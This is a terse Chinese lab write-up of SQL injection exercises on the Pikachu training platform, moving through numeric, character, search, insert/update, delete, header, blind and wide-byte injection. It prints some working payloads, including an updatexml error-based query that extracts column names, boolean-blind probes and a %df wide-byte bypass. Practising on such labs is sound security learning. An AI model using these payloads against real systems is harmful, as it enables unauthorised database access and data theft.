pikachu的sql注入

时间:2022-02-26 06:10:48

数字型注入(post)

 burp抓包

pikachu的sql注入

 成功

pikachu的sql注入

 

 

 

字符型注入(get)

 直接注入

 成功注入。

 pikachu的sql注入

 

 

 

搜索型注入

pikachu的sql注入

 使用同样的方法也能同样注入成功

 

xx型注入

需要闭合

 加)之后注入成功。

pikachu的sql注入

 

 

 

 

 

insert/updata 注入

a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘

burp抓包修改

pikachu的sql注入

 

 

 

注入成功。

delete 注入

 

pikachu的sql注入

 

 

 

 注入成功

 

 

http header注入

pikachu的sql注入

 

 

 

 注入成功

 

盲注 base on boolian

pikachu的sql注入

 

 

 

 

 

kobe and length(database())>5# 。。。 kobe and length(database())=7#
kobe and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注,只能挨个试。。

盲注(based on time)

 同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。

pikachu的sql注入

 

 

 

宽字节注入

 刚开始尝试发现注入不行,抓包发现以及进行了编码

 在抓包后修改也不行  

 发现‘被后台转移,所以构造payload kobe%df or 1=1#

pikachu的sql注入

 

 

 

 pikachu的sql注入

 

 

 

 注入成功